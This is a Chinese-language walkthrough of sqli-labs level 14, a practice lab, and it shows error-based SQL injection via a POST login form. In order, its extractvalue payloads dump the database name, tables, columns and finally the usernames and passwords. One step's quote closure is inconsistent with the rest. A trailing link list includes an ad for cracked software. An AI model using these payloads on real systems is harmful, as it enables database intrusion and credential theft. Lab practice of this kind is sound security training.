sqli-labs第十四关——“POST报错注入

一:判断注入类型

和上一关一样,输入如下代码,回显报错,其余类型无回显

复制代码
uname=1"&passwd=123

判断为双引号字符型,尝试闭合

判断正确,成功登录

二:开始攻击

1.爆数据库名

复制代码
uname=1" and extractvalue(1,concat(0x7e,(select database())))#&passwd=123

2. 爆表名

复制代码
uname=1" and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())))#&passwd=123

3.爆列名

复制代码
uname=1') and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='users')))#&passwd=123

4.爆数据

判断数据量

复制代码
uname=1" and extractvalue(1,concat(0x7e,(select count(*) from users)))#&passwd=123

分两段爆数据

复制代码
uname=1" and extractvalue(1,concat(0x7e, substring((select group_concat(username,0x3a,password) from users),1,32)))#&passwd=123
uname=1" and extractvalue(1,concat(0x7e, substring((select group_concat(username,0x3a,password) from users),32,32)))#&passwd=123

❀❀❀ 完结撒花!! ❀❀❀

相关推荐
vx_vxbs668 分钟前
【SSM电动车智能充电服务平台】(免费领源码+演示录像)|可做计算机毕设Java、Python、PHP、小程序APP、C#、爬虫大数据、单片机、文案
java·spring boot·mysql·spring cloud·小程序·php·idea
f***01931 小时前
【MySQL】JDBC的连接
数据库·mysql
5***T4481 小时前
开启mysql的binlog日志
数据库·mysql
q***33371 小时前
UNION 和 UNION ALL 的区别:深入解析 SQL 中的合并操作
数据库·sql·oracle
郑重其事,鹏程万里1 小时前
关系型数据库(derby)
数据库
Elastic 中国社区官方博客1 小时前
使用 A2A 协议和 MCP 在 Elasticsearch 中创建一个 LLM agent 新闻室:第二部分
大数据·数据库·人工智能·elasticsearch·搜索引擎·ai·全文检索
秋邱2 小时前
价值升维!公益赋能 + 绿色技术 + 终身学习,构建可持续教育 AI 生态
网络·数据库·人工智能·redis·python·学习·docker
前端木偶人之神2 小时前
mysql基础学习
mysql
Three~stone2 小时前
Matlab2025b的安装教程(附安装包和密钥破解文件)
学习·mysql·持续部署
郑重其事,鹏程万里2 小时前
关系型数据库(h2)
数据库